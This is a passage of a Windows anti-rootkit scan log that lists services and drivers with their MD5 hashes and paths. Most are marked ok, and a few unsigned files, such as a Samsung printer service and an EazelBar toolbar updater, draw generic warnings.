01:19:40.0975 5804 p2psvc - ok
01:19:41.0068 5804 [ 0FA9B5055484649D63C303FE404E5F4D ] Parport C:\Windows\system32\drivers\parport.sys
01:19:41.0146 5804 Parport - ok
01:19:41.0178 5804 [ 3B38467E7C3DAED009DFE359E17F139F ] partmgr C:\Windows\system32\drivers\partmgr.sys
01:19:41.0193 5804 partmgr - ok
01:19:41.0224 5804 [ 4F9A6A8A31413180D0FCB279AD5D8112 ] Parvdm C:\Windows\system32\drivers\parvdm.sys
01:19:41.0287 5804 Parvdm - ok
01:19:41.0302 5804 [ C6276AD11F4BB49B58AA1ED88537F14A ] PcaSvc C:\Windows\System32\pcasvc.dll
01:19:41.0380 5804 PcaSvc - ok
01:19:41.0396 5804 [ 01B94418DEB235DFF777CC80076354B4 ] pci C:\Windows\system32\drivers\pci.sys
01:19:41.0412 5804 pci - ok
01:19:41.0443 5804 [ FC175F5DDAB666D7F4D17449A547626F ] pciide C:\Windows\system32\drivers\pciide.sys
01:19:41.0474 5804 pciide - ok
01:19:41.0490 5804 [ E6F3FB1B86AA519E7698AD05E58B04E5 ] pcmcia C:\Windows\system32\drivers\pcmcia.sys
01:19:41.0505 5804 pcmcia - ok
01:19:41.0552 5804 [ 6349F6ED9C623B44B52EA3C63C831A92 ] PEAUTH C:\Windows\system32\drivers\peauth.sys
01:19:41.0724 5804 PEAUTH - ok
01:19:41.0817 5804 [ B1689DF169143F57053F795390C99DB3 ] pla C:\Windows\system32\pla.dll
01:19:42.0036 5804 pla - ok
01:19:42.0067 5804 [ 78F975CB6D18265BE6F492EDB2D7BC7B ] PlugPlay C:\Windows\system32\umpnpmgr.dll
01:19:42.0238 5804 PlugPlay - ok
01:19:42.0285 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] PNRPAutoReg C:\Windows\system32\p2psvc.dll
01:19:42.0410 5804 PNRPAutoReg - ok
01:19:42.0457 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] PNRPsvc C:\Windows\system32\p2psvc.dll
01:19:42.0550 5804 PNRPsvc - ok
01:19:42.0613 5804 [ 47B8F37AA18B74D8C2E1BC1A7A2C8F8A ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
01:19:42.0706 5804 PolicyAgent - ok
01:19:42.0753 5804 [ ECFFFAEC0C1ECD8DBC77F39070EA1DB1 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
01:19:42.0800 5804 PptpMiniport - ok
01:19:42.0862 5804 [ 2027293619DD0F047C584CF2E7DF4FFD ] Processor C:\Windows\system32\drivers\processr.sys
01:19:42.0909 5804 Processor - ok
01:19:42.0972 5804 [ B627E4FC8585E8843C5905D4D3587A90 ] ProfSvc C:\Windows\system32\profsvc.dll
01:19:43.0096 5804 ProfSvc - ok
01:19:43.0143 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] ProtectedStorage C:\Windows\system32\lsass.exe
01:19:43.0206 5804 ProtectedStorage - ok
01:19:43.0268 5804 [ BFEF604508A0ED1EAE2A73E872555FFB ] PSched C:\Windows\system32\DRIVERS\pacer.sys
01:19:43.0299 5804 PSched - ok
01:19:43.0377 5804 [ 0A6DB55AFB7820C99AA1F3A1D270F4F6 ] ql2300 C:\Windows\system32\drivers\ql2300.sys
01:19:43.0455 5804 ql2300 - ok
01:19:43.0518 5804 [ 81A7E5C076E59995D54BC1ED3A16E60B ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
01:19:43.0533 5804 ql40xx - ok
01:19:43.0580 5804 [ E9ECAE663F47E6CB43962D18AB18890F ] QWAVE C:\Windows\system32\qwave.dll
01:19:43.0720 5804 QWAVE - ok
01:19:43.0752 5804 [ 9F5E0E1926014D17486901C88ECA2DB7 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
01:19:43.0783 5804 QWAVEdrv - ok
01:19:43.0798 5804 [ 147D7F9C556D259924351FEB0DE606C3 ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
01:19:43.0861 5804 RasAcd - ok
01:19:43.0876 5804 [ F6A452EB4CEADBB51C9E0EE6B3ECEF0F ] RasAuto C:\Windows\System32\rasauto.dll
01:19:43.0986 5804 RasAuto - ok
01:19:44.0017 5804 [ A214ADBAF4CB47DD2728859EF31F26B0 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
01:19:44.0064 5804 Rasl2tp - ok
01:19:44.0079 5804 [ 6E7C284FC5C4EC07AD164D93810385A6 ] RasMan C:\Windows\System32\rasmans.dll
01:19:44.0220 5804 RasMan - ok
01:19:44.0251 5804 [ 3E9D9B048107B40D87B97DF2E48E0744 ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
01:19:44.0282 5804 RasPppoe - ok
01:19:44.0313 5804 [ A7D141684E9500AC928A772ED8E6B671 ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
01:19:44.0360 5804 RasSstp - ok
01:19:44.0376 5804 [ 6E1C5D0457622F9EE35F683110E93D14 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
01:19:44.0422 5804 rdbss - ok
01:19:44.0438 5804 [ 89E59BE9A564262A3FB6C4F4F1CD9899 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
01:19:44.0485 5804 RDPCDD - ok
01:19:44.0500 5804 [ FBC0BACD9C3D7F6956853F64A66E252D ] rdpdr C:\Windows\system32\drivers\rdpdr.sys
01:19:44.0532 5804 rdpdr - ok
01:19:44.0547 5804 [ 9D91FE5286F748862ECFFA05F8A0710C ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
01:19:44.0578 5804 RDPENCDD - ok
01:19:44.0610 5804 [ E1C18F4097A5ABCEC941DC4B2F99DB7E ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
01:19:44.0641 5804 RDPWD - ok
01:19:44.0672 5804 [ BCDD6B4804D06B1F7EBF29E53A57ECE9 ] RemoteAccess C:\Windows\System32\mprdim.dll
01:19:44.0734 5804 RemoteAccess - ok
01:19:44.0766 5804 [ CC4E32400F3C7253400CF8F3F3A0B676 ] RemoteRegistry C:\Windows\system32\regsvc.dll
01:19:44.0859 5804 RemoteRegistry - ok
01:19:44.0937 5804 [ 23F486726DA7A9B2F3EC7326421A9C36 ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
01:19:44.0968 5804 RFCOMM - ok
01:19:44.0984 5804 [ 5123F83CBC4349D065534EEB6BBDC42B ] RpcLocator C:\Windows\system32\locator.exe
01:19:45.0093 5804 RpcLocator - ok
01:19:45.0140 5804 [ 301AE00E12408650BADDC04DBC832830 ] RpcSs C:\Windows\system32\rpcss.dll
01:19:45.0249 5804 RpcSs - ok
01:19:45.0312 5804 [ 9C508F4074A39E8B4B31D27198146FAD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
01:19:45.0358 5804 rspndr - ok
01:19:45.0358 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] SamSs C:\Windows\system32\lsass.exe
01:19:45.0421 5804 SamSs - ok
01:19:45.0452 5804 [ 24E9427B1BBD7F0A3DBD8657D552A6C6 ] Samsung UPD Service C:\Windows\System32\SUPDSvc.exe
01:19:45.0546 5804 Samsung UPD Service ( UnsignedFile.Multi.Generic ) - warning
01:19:45.0546 5804 Samsung UPD Service - detected UnsignedFile.Multi.Generic (1)
01:19:45.0561 5804 [ 3CE8F073A557E172B330109436984E30 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
01:19:45.0592 5804 sbp2port - ok
01:19:45.0624 5804 [ 11387E32642269C7E62E8B52C060B3C6 ] SCardSvr C:\Windows\System32\SCardSvr.dll
01:19:45.0702 5804 SCardSvr - ok
01:19:45.0780 5804 [ 7B587B8A6D4A99F79D2902D0385F29BD ] Schedule C:\Windows\system32\schedsvc.dll
01:19:45.0873 5804 Schedule - ok
01:19:45.0920 5804 [ 87C2D0377B23E2D8A41093C2F5FB1A5B ] SCPolicySvc C:\Windows\System32\certprop.dll
01:19:45.0967 5804 SCPolicySvc - ok
01:19:46.0029 5804 [ 126EA89BCC413EE45E3004FB0764888F ] sdbus C:\Windows\system32\DRIVERS\sdbus.sys
01:19:46.0060 5804 sdbus - ok
01:19:46.0107 5804 [ 716313D9F6B0529D03F726D5AAF6F191 ] SDRSVC C:\Windows\System32\SDRSVC.dll
01:19:46.0216 5804 SDRSVC - ok
01:19:46.0248 5804 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
01:19:46.0310 5804 secdrv - ok
01:19:46.0326 5804 [ FD5199D4D8A521005E4B5EE7FE00FA9B ] seclogon C:\Windows\system32\seclogon.dll
01:19:46.0419 5804 seclogon - ok
01:19:46.0450 5804 [ A9BBAB5759771E523F55563D6CBE140F ] SENS C:\Windows\System32\sens.dll
01:19:46.0528 5804 SENS - ok
01:19:46.0544 5804 [ 68E44E331D46F0FB38F0863A84CD1A31 ] Serenum C:\Windows\system32\drivers\serenum.sys
01:19:46.0606 5804 Serenum - ok
01:19:46.0638 5804 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
01:19:46.0700 5804 Serial - ok
01:19:46.0731 5804 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
01:19:46.0762 5804 sermouse - ok
01:19:46.0794 5804 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
01:19:46.0887 5804 SessionEnv - ok
01:19:46.0918 5804 [ 3EFA810BDCA87F6ECC24F9832243FE86 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
01:19:46.0950 5804 sffdisk - ok
01:19:46.0965 5804 [ E95D451F7EA3E583AEC75F3B3EE42DC5 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
01:19:47.0012 5804 sffp_mmc - ok
01:19:47.0028 5804 [ 3D0EA348784B7AC9EA9BD9F317980979 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
01:19:47.0059 5804 sffp_sd - ok
01:19:47.0074 5804 [ C33BFBD6E9E41FCD9FFEF9729E9FAED6 ] sfloppy C:\Windows\system32\DRIVERS\sfloppy.sys
01:19:47.0121 5804 sfloppy - ok
01:19:47.0152 5804 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
01:19:47.0262 5804 SharedAccess - ok
01:19:47.0308 5804 [ 1E3FDB80E40A3CE645F229DFBDFB7694 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
01:19:47.0433 5804 ShellHWDetection - ok
01:19:47.0480 5804 [ 1D76624A09A054F682D746B924E2DBC3 ] sisagp C:\Windows\system32\drivers\sisagp.sys
01:19:47.0496 5804 sisagp - ok
01:19:47.0527 5804 [ F7DA61BD62A16510227656C3477E2B52 ] SiSGbeLH C:\Windows\system32\DRIVERS\SiSGB6.sys
01:19:47.0558 5804 SiSGbeLH - ok
01:19:47.0589 5804 [ 43CB7AA756C7DB280D01DA9B676CFDE2 ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
01:19:47.0620 5804 SiSRaid2 - ok
01:19:47.0652 5804 [ A99C6C8B0BAA970D8AA59DDC50B57F94 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
01:19:47.0667 5804 SiSRaid4 - ok
01:19:47.0745 5804 [ 8B603F150942992F2E6792E507B4C67F ] SkypeUpdate C:\Program Files\Skype\Updater\Updater.exe
01:19:47.0823 5804 SkypeUpdate - ok
01:19:47.0917 5804 [ 0BA91E1358AD25236863039BB2609A2E ] slsvc C:\Windows\system32\SLsvc.exe
01:19:48.0151 5804 slsvc - ok
01:19:48.0260 5804 [ 7C6DC44CA0BFA6291629AB764200D1D4 ] SLUINotify C:\Windows\system32\SLUINotify.dll
01:19:48.0385 5804 SLUINotify - ok
01:19:48.0400 5804 [ 031E6BCD53C9B2B9ACE111EAFEC347B6 ] Smb C:\Windows\system32\DRIVERS\smb.sys
01:19:48.0447 5804 Smb - ok
01:19:48.0541 5804 [ C8A58FC905C9184FA70E37F71060C64D ] smserial C:\Windows\system32\DRIVERS\smserial.sys
01:19:48.0634 5804 smserial - ok
01:19:48.0697 5804 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
01:19:48.0790 5804 SNMPTRAP - ok
01:19:48.0915 5804 [ 060F51141B20B8156804446A04AB8B2A ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
01:19:49.0071 5804 SNP2UVC - ok
01:19:49.0118 5804 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
01:19:49.0196 5804 spldr - ok
01:19:49.0305 5804 [ 3665F79026A3F91FBCA63F2C65A09B19 ] Spooler C:\Windows\System32\spoolsv.exe
01:19:49.0461 5804 Spooler - ok
01:19:49.0524 5804 [ 2252AEF839B1093D16761189F45AF885 ] srv C:\Windows\system32\DRIVERS\srv.sys
01:19:49.0570 5804 srv - ok
01:19:49.0586 5804 [ B7FF59408034119476B00A81BB53D5D1 ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
01:19:49.0648 5804 srv2 - ok
01:19:49.0695 5804 [ 2ACCC9B12AF02030F531E6CCA6F8B76E ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
01:19:49.0726 5804 srvnet - ok
01:19:49.0773 5804 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
01:19:49.0882 5804 SSDPSRV - ok
01:19:49.0945 5804 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
01:19:49.0976 5804 ssmdrv - ok
01:19:50.0007 5804 [ EF3458337D7341A05169CEFC73709264 ] SSPORT C:\Windows\system32\Drivers\SSPORT.sys
01:19:50.0023 5804 SSPORT ( UnsignedFile.Multi.Generic ) - warning
01:19:50.0023 5804 SSPORT - detected UnsignedFile.Multi.Generic (1)
01:19:50.0054 5804 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
01:19:50.0148 5804 SstpSvc - ok
01:19:50.0194 5804 [ 7DD08A597BC56051F320DA0BAF69E389 ] stisvc C:\Windows\System32\wiaservc.dll
01:19:50.0366 5804 stisvc - ok
01:19:50.0460 5804 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
01:19:50.0475 5804 swenum - ok
01:19:50.0506 5804 [ B36C7CDB86F7F7A8E884479219766950 ] swprv C:\Windows\System32\swprv.dll
01:19:50.0631 5804 swprv - ok
01:19:50.0662 5804 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
01:19:50.0678 5804 Symc8xx - ok
01:19:50.0709 5804 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
01:19:50.0725 5804 Sym_hi - ok
01:19:50.0772 5804 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
01:19:50.0787 5804 Sym_u3 - ok
01:19:50.0834 5804 [ 55F6E55CC2430CA8713387106FA79817 ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
01:19:50.0850 5804 SynTP - ok
01:19:50.0896 5804 [ 8710A92D0024B03B5FB9540DF1F71F1D ] SysMain C:\Windows\system32\sysmain.dll
01:19:51.0006 5804 SysMain - ok
01:19:51.0068 5804 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
01:19:51.0177 5804 TabletInputService - ok
01:19:51.0224 5804 [ 680916BB09EE0F3A6ACA7C274B0D633F ] TapiSrv C:\Windows\System32\tapisrv.dll
01:19:51.0333 5804 TapiSrv - ok
01:19:51.0364 5804 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
01:19:51.0474 5804 TBS - ok
01:19:51.0520 5804 [ 782568AB6A43160A159B6215B70BCCE9 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
01:19:51.0583 5804 Tcpip - ok
01:19:51.0661 5804 [ 782568AB6A43160A159B6215B70BCCE9 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
01:19:51.0708 5804 Tcpip6 - ok
01:19:51.0817 5804 [ D4A2E4A4B011F3A883AF77315A5AE76B ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
01:19:51.0864 5804 tcpipreg - ok
01:19:51.0879 5804 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
01:19:51.0926 5804 TDPIPE - ok
01:19:51.0957 5804 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
01:19:52.0004 5804 TDTCP - ok
01:19:52.0051 5804 [ D09276B1FAB033CE1D40DCBDF303D10F ] tdx C:\Windows\system32\DRIVERS\tdx.sys
01:19:52.0098 5804 tdx - ok
01:19:52.0410 5804 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
01:19:52.0987 5804 TeamViewer8 - ok
01:19:53.0018 5804 [ A048056F5E1A96A9BF3071B91741A5AA ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
01:19:53.0065 5804 TermDD - ok
01:19:53.0112 5804 [ D605031E225AACCBCEB5B76A4F1603A6 ] TermService C:\Windows\System32\termsrv.dll
01:19:53.0361 5804 TermService - ok
01:19:53.0408 5804 [ 1E3FDB80E40A3CE645F229DFBDFB7694 ] Themes C:\Windows\system32\shsvcs.dll
01:19:53.0517 5804 Themes - ok
01:19:53.0533 5804 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
01:19:53.0626 5804 THREADORDER - ok
01:19:53.0642 5804 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
01:19:53.0751 5804 TrkWks - ok
01:19:53.0798 5804 [ 16613A1BAD034D4ECF957AF18B7C2FF5 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
01:19:53.0845 5804 TrustedInstaller - ok
01:19:53.0876 5804 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
01:19:53.0907 5804 tssecsrv - ok
01:19:53.0938 5804 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
01:19:53.0970 5804 tunmp - ok
01:19:54.0016 5804 [ 6042505FF6FA9AC1EF7684D0E03B6940 ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
01:19:54.0048 5804 tunnel - ok
01:19:54.0063 5804 [ 7D33C4DB2CE363C8518D2DFCF533941F ] uagp35 C:\Windows\system32\drivers\uagp35.sys
01:19:54.0094 5804 uagp35 - ok
01:19:54.0110 5804 [ 8B5088058FA1D1CD897A2113CCFF6C58 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
01:19:54.0141 5804 udfs - ok
01:19:54.0172 5804 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
01:19:54.0266 5804 UI0Detect - ok
01:19:54.0297 5804 [ B0ACFDC9E4AF279E9116C03E014B2B27 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
01:19:54.0313 5804 uliagpkx - ok
01:19:54.0360 5804 [ 9224BB254F591DE4CA8D572A5F0D635C ] uliahci C:\Windows\system32\drivers\uliahci.sys
01:19:54.0375 5804 uliahci - ok
01:19:54.0422 5804 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
01:19:54.0438 5804 UlSata - ok
01:19:54.0484 5804 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
01:19:54.0500 5804 ulsata2 - ok
01:19:54.0516 5804 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
01:19:54.0562 5804 umbus - ok
01:19:54.0609 5804 [ F53CF959B09B94AAE5AF30E150B9A2AF ] Updater Service for EazelBar C:\Program Files\EazelBar\ToolbarUpdaterService.exe
01:19:54.0640 5804 Updater Service for EazelBar ( UnsignedFile.Multi.Generic ) - warning
01:19:54.0640 5804 Updater Service for EazelBar - detected UnsignedFile.Multi.Generic (1)
01:19:54.0656 5804 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
01:19:54.0796 5804 upnphost - ok
01:19:54.0843 5804 [ 8BF5D980CDCE35FB26F05047144BB57E ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
01:19:54.0874 5804 USBAAPL - ok
01:19:54.0952 5804 [ A7CD5B4ADEA26765CAB06BDAB7B07B13 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
01:19:54.0999 5804 usbccgp - ok
01:19:55.0030 5804 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
01:19:55.0093 5804 usbcir - ok
01:19:55.0155 5804 [ 686D4188AE36254C3008B71FEDACADF3 ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
01:19:55.0171 5804 usbehci - ok
01:19:55.0186 5804 [ 4E42F665A658F08D153F7FFFE7C83806 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
01:19:55.0218 5804 usbhub - ok
01:19:55.0233 5804 [ D16C39CF6C1EC57614FBD8BD3EF2682D ] usbohci C:\Windows\system32\DRIVERS\usbohci.sys
01:19:55.0264 5804 usbohci - ok
01:19:55.0327 5804 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
01:19:55.0358 5804 usbprint - ok
01:19:55.0389 5804 [ 87BA6B83C5D19B69160968D07D6E2982 ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
01:19:55.0436 5804 USBSTOR - ok
01:19:55.0467 5804 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
01:19:55.0498 5804 usbuhci - ok
01:19:55.0576 5804 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
01:19:55.0623 5804 usbvideo - ok
01:19:55.0670 5804 [ 032A0ACC3909AE7215D524E29D536797 ] UxSms C:\Windows\System32\uxsms.dll
01:19:55.0810 5804 UxSms - ok
01:19:55.0842 5804 [ B13BC395B9D6116628F5AF47E0802AC4 ] vds C:\Windows\System32\vds.exe
01:19:55.0982 5804 vds - ok
01:19:56.0076 5804 [ 87B06E1F30B749A114F74622D013F8D4 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
01:19:56.0122 5804 vga - ok
01:19:56.0154 5804 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
01:19:56.0216 5804 VgaSave - ok
01:19:56.0232 5804 [ 5D7159DEF58A800D5781BA3A879627BC ] viaagp C:\Windows\system32\drivers\viaagp.sys
01:19:56.0247 5804 viaagp - ok
01:19:56.0278 5804 [ C4F3A691B5BAD343E6249BD8C2D45DEE ] ViaC7 C:\Windows\system32\drivers\viac7.sys
01:19:56.0325 5804 ViaC7 - ok
01:19:56.0356 5804 [ AADF5587A4063F52C2C3FED7887426FC ] viaide C:\Windows\system32\drivers\viaide.sys
01:19:56.0388 5804 viaide - ok
01:19:56.0403 5804 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
01:19:56.0434 5804 volmgr - ok
01:19:56.0450 5804 [ 98F5FFE6316BD74E9E2C97206C190196 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
01:19:56.0481 5804 volmgrx - ok
01:19:56.0497 5804 [ D8B4A53DD2769F226B3EB374374987C9 ] volsnap C:\Windows\system32\drivers\volsnap.sys
01:19:56.0528 5804 volsnap - ok
01:19:56.0544 5804 [ 587253E09325E6BF226B299774B728A9 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
01:19:56.0559 5804 vsmraid - ok
01:19:56.0606 5804 [ D5FB73D19C46ADE183F968E13F186B23 ] VSS C:\Windows\system32\vssvc.exe
01:19:56.0746 5804 VSS - ok
01:19:56.0778 5804 [ 1CF9206966A8458CDA9A8B20DF8AB7D3 ] W32Time C:\Windows\system32\w32time.dll
01:19:56.0871 5804 W32Time - ok
01:19:56.0918 5804 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
01:19:56.0965 5804 WacomPen - ok
01:19:56.0980 5804 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
01:19:57.0012 5804 Wanarp - ok
01:19:57.0027 5804 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
01:19:57.0058 5804 Wanarpv6 - ok
01:19:57.0090 5804 [ F3A5C2E1A6533192B070D06ECF6BE796 ] wcncsvc C:\Windows\System32\wcncsvc.dll
01:19:57.0199 5804 wcncsvc - ok
01:19:57.0230 5804 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
01:19:57.0339 5804 WcsPlugInService - ok
01:19:57.0386 5804 [ 78FE9542363F297B18C027B2D7E7C07F ] Wd C:\Windows\system32\drivers\wd.sys
01:19:57.0402 5804 Wd - ok
01:19:57.0448 5804 [ B6F0A7AD6D4BD325FBCD8BAC96CD8D96 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
01:19:57.0480 5804 Wdf01000 - ok
01:19:57.0558 5804 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
01:19:57.0714 5804 WdiServiceHost - ok
01:19:57.0714 5804 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
01:19:57.0838 5804 WdiSystemHost - ok
01:19:57.0870 5804 [ CF9A5F41789B642DB967021DE06A2713 ] WebClient C:\Windows\System32\webclnt.dll
01:19:57.0948 5804 WebClient - ok
01:19:57.0994 5804 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
01:19:58.0104 5804 Wecsvc - ok
01:19:58.0135 5804 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
01:19:58.0244 5804 wercplsupport - ok
01:19:58.0260 5804 [ FD1965AAA112C6818A30AB02742D0461 ] WerSvc C:\Windows\System32\WerSvc.dll
01:19:58.0369 5804 WerSvc - ok
01:19:58.0431 5804 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
01:19:58.0447 5804 WinDefend - ok
01:19:58.0462 5804 WinHttpAutoProxySvc - ok
01:19:58.0509 5804 [ 00B79A7C984678F24CF052E5BEB3A2F5 ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
01:19:58.0540 5804 Winmgmt - ok
01:19:58.0603 5804 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
01:19:58.0743 5804 WinRM - ok
01:19:58.0821 5804 [ 275F4346E569DF56CFB95243BD6F6FF0 ] Wlansvc C:\Windows\System32\wlansvc.dll
01:19:58.0930 5804 Wlansvc - ok
01:19:58.0962 5804 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
01:19:58.0993 5804 WmiAcpi - ok
01:19:59.0024 5804 [ ABA4CF9F856D9A3A25F4DDD7690A6E9D ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
01:19:59.0071 5804 wmiApSrv - ok
01:19:59.0133 5804 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
01:19:59.0258 5804 WMPNetworkSvc - ok
01:19:59.0336 5804 [ 5D94CD167751294962BA238D82DD1BB8 ] WPCSvc C:\Windows\System32\wpcsvc.dll
01:19:59.0523 5804 WPCSvc - ok
01:19:59.0586 5804 [ 396D406292B0CD26E3504FFE82784702 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
01:19:59.0726 5804 WPDBusEnum - ok
01:19:59.0788 5804 [ 0CEC23084B51B8288099EB710224E955 ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
01:19:59.0820 5804 WpdUsb - ok
01:19:59.0898 5804 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
01:19:59.0976 5804 WPFFontCache_v0400 - ok
01:20:00.0069 5804 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
01:20:00.0116 5804 ws2ifsl - ok
01:20:00.0147 5804 [ 683DD16B590372F2C9661D277F35E49C ] wscsvc C:\Windows\System32\wscsvc.dll
01:20:00.0272 5804 wscsvc - ok
01:20:00.0288 5804 WSearch - ok
01:20:00.0350 5804 [ D79538B67FA641E986855DEF651E78FE ] wuauserv C:\Windows\system32\wuaueng.dll
01:20:00.0568 5804 wuauserv - ok
